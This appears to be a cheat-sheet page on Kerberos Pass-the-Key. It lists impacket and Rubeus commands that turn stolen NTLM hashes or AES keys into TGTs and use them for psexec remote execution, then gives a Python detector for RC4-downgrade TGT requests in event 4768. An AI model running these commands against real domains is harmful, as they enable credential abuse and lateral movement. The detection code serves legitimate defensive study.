PASS-THE-KEY

In this technique, instead of passing the hash directly, we use the account's NTLM hash (or AES key) to request a valid Kerberos ticket (TGT).

impacket

>python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com
>export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
>python3 psexec.py "jurassic.park/[email protected]" -k -no-pass
>./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
>ktutil -k ~/mykeys add -p [email protected] -e arcfour-hmac-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
>kinit -t ~/mykeys [email protected]
>klist

Rubeus

>.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
>.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt
>.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
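On the defensive side, the /rc4 versus /aes256 choice above is what detection usually keys on: a successful TGT request (Windows Security event 4768) with Ticket Encryption Type 0x17 (RC4-HMAC) for an account that should be getting AES tickets is the classic encryption-downgrade indicator, while /aes256 with /opsec is what removes that particular signal. The following checker is an added example, not part of this page or of impacket/Rubeus; it runs over constructed, flattened 4768 records with hypothetical account names and addresses.

```python
# Added example (not from this page): flag Kerberos TGT requests (event 4768)
# that used RC4-HMAC (etype 0x17) for accounts where AES is expected. Pass-the-Key
# with an NTLM/RC4 key produces such requests; an AES key (or Rubeus /opsec)
# does not, so treat this as one indicator among several, not the only one.
from dataclasses import dataclass

RC4_HMAC = 0x17      # Ticket Encryption Type values as logged in 4768
AES256_CTS = 0x12

@dataclass
class TgtRequest:
    account: str
    client_ip: str
    etype: int
    preauth_type: int  # 2 = PA-ENC-TIMESTAMP, 0 = no pre-auth
    status: str        # "0x0" means the KDC issued the ticket

def parse_4768(line: str) -> TgtRequest:
    """Parse one constructed, flattened 4768 record of key=value fields."""
    fields = dict(kv.split("=", 1) for kv in line.split("|"))
    return TgtRequest(
        account=fields["TargetUserName"],
        client_ip=fields["IpAddress"],
        etype=int(fields["TicketEncryptionType"], 16),
        preauth_type=int(fields["PreAuthType"]),
        status=fields["Status"],
    )

def rc4_downgrades(lines, aes_accounts):
    """Return (account, client_ip) pairs that obtained an RC4 TGT although AES is expected."""
    hits = []
    for line in lines:
        req = parse_4768(line)
        if req.status == "0x0" and req.etype == RC4_HMAC and req.account in aes_accounts:
            hits.append((req.account, req.client_ip))
    return hits

# Constructed sample records (hypothetical accounts and addresses).
SAMPLE_4768 = [
    "TargetUserName=Administrator|IpAddress=10.0.0.25|TicketEncryptionType=0x17|PreAuthType=2|Status=0x0",
    "TargetUserName=velociraptor|IpAddress=10.0.0.31|TicketEncryptionType=0x12|PreAuthType=2|Status=0x0",
    "TargetUserName=svc_legacy|IpAddress=10.0.0.40|TicketEncryptionType=0x17|PreAuthType=2|Status=0x0",
    "TargetUserName=Administrator|IpAddress=10.0.0.25|TicketEncryptionType=0x17|PreAuthType=2|Status=0x18",
]
AES_EXPECTED = {"Administrator", "velociraptor"}  # accounts known to hold AES keys

if __name__ == "__main__":
    for account, ip in rc4_downgrades(SAMPLE_4768, AES_EXPECTED):
        print(f"RC4 TGT issued to AES-capable account {account} from {ip}")
```

The legacy service account with an RC4 ticket and the failed request (Status 0x18) are deliberately left unflagged, so the allow-list of AES-capable accounts is what turns this from noise into a usable alert.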